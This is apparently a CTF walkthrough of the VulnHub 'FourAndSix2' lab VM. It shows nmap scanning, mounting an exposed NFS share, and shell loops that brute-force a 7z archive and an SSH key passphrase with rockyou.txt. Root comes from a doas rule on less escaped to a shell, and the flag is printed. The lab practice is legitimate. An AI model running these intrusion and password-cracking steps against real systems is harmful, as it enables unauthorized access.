Today I will exploit the vulnerable image which called "FourAndSix2". Here is the url to download this image: https://www.vulnhub.com/entry/fourandsix-201,266/. we need to import the image to vmware once we downloaded it. now here we go.
>> msfconsole
msf>> db_nmap 192.168.30.1/24
msf>> db_nmap 192.168.30.93
We can review the result of scanning and we found that it exists nfs vulnerability
msf>> search nfs
msf>> use ....
msf>> apt install nfs-common
msf>> mkdir /nfstest
msf>> mount -t nfs 192.168.30.93:/home/user/storage /nfstest -o nolock
msf>>cp /nfstest/backup.7z ~/vulnhub/fourandsix2
and then we found backup.7z has password protection. so we upload it to https://www.lostmypass.com/ to get the password
we found id_rsa and id_rsa.pub. but we can't use the id_rsa to login directly. we need to crack id_rsa
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
now we got the password: 12345678
ssh -i id_rsa user@192.168.30.93
>> find / -perm -u=s -type f 2>/dev/null
fourandsix2# cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
>> doas /usr/bin/less /var/log/authlog
and enter v key translate to vi model and enter !sh
finally, we got the flag: acd043bc3103ed3dd02eee99d5b0ff42
and we got two shell to crack id_rsa and 7z password
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
magic command...